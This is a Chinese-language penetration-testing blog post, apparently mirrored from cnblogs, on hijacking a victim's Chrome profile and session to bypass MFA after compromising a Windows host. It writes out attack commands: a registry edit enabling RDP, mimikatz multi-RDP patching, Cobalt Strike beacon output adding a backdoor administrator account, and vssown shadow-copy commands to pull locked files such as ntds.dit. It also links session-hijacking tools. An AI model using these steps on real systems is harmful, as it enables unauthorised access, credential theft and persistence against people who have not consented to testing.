zoukankan      html  css  js  c++  java
  • Hijack chrome browser

    0X01 哪里会遇到这些问题?

    在平时的渗透中 我们难免会遇到很多关于browser的问题 
    such as : csadmin login in 有MFA保护的web程序
    我们此时不能dump密码来解决了 那该怎么办???

    0X02解决办法

    当对方是chrome时候

    0x01这时候我们可以 rdp多开 然后chrome配置文件劫持来达到我们的目的
    当对方是iexplore.exe我们可以
    0x02使攻击者可以用自己的浏览器通过目标的浏览器中继请求。这使攻击者可以以目标用户的身份与应用网站进行静默交互、实现后渗透目标

    0X03复现过程

    0x01在chrome中实现劫持

    模拟环境(ps:固态还没有回来所以先用工作中把哈哈)
    win10 pc workgroup
    liunx cs客户端
    win 7 cs

    假设环境 我们得到了一台pc权限 想进一步渗透邮件 但是有MFA 我们假设qq.com就有MFA

     目标在PC能被我们随意控制(这里我们由于是本机 直接不注入进程了 windows exe直接开始进行实验)

     接下来我们需要去实现 登录localhost用户的pronmail账户 不需要密码

    前提
    0x01编译一个 3389 more open
    无视文件block dump出chorm配置

     这里用户多开我们用mimikatz直接解决

    REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    
    privilege::debug
    ts::multirdp(ps:dll那个我一直编译不成功 我太菜了 作者调用了别人一个库的文件 没告诉我们 我实在找不到了)
    最后pyc++爷爷终于编译好了 但是 我个人觉得 相比mimitakz在内存里面修改 起来 这个直接改dll实在是过于危险
    so 最终还是猕猴桃香

    beacon> shell net user admin P@ssw0rd /add
    [*] Tasked beacon to run: net user admin P@ssw0rd /add
    [+] host called home, sent: 75 bytes
    [+] received output:
    命令成功完成。
    
    
    beacon> shell net localgroup administrators admin /add
    [*] Tasked beacon to run: net localgroup administrators admin /add
    [+] host called home, sent: 71 bytes
    [+] received output:
    命令成功完成。

    对于文件被锁定的情况 我们在导出ntds.dit的时候就遇到文件被锁定的情况 bypass方法很多

    这里我用vssown来解决的

    vssown
    与vssadmin程序类似,Tim Tomes开发了vssown,它是一个可视化的基本脚本,可以创建和删除卷影副本,从卸载的卷影副本运行任意可执行文件,以及启动和停止卷影复制服务。
    
    cscript vssown.vbs /start
    cscript vssown.vbs /create c
    cscript vssown.vbs /list
    cscript vssown.vbs /delete
    copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy11windows
    tds
    tds.dit C:vssown
    github https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs

    好的接下来我们开始操作

     

     看到我们session已经成功劫持

    参考
    https://xz.aliyun.com/t/4417
    http://blog.leanote.com/post/snowming/4e07af1cab60
    https://github.com/ThunderGunExpress/ThunderChrome
    https://xz.aliyun.com/t/2527#toc-6
  • 相关阅读:
    POJ1609 UVALive2815 UVA1196 ZOJ1787 Tiling Up Blocks【二维最长上升子序列+DP】
    UVALive3638 UVA12100 POJ3125 HDU1972 Printer Queue【队列+模拟】
    UVA10391 ZOJ1825 Compound Words【SET+暴力】
    NUC1157 To the Max【最大子段和+DP】
    NUC1399 Sum It Up【DFS】
    NUC1742 Subsequence【前缀和+二分搜索+尺取法】
    NUC1371 Who's in the Middle【中位数+排序】
    NUC1312 Sum【水题+数学题】
    POJ2100 Graveyard Design【尺取法】
    UVALive3399 UVA1210 POJ2739 Sum of Consecutive Prime Numbers【素数筛选+尺取法】
  • 原文地址:https://www.cnblogs.com/-zhong/p/13115849.html
Copyright © 2011-2022 走看看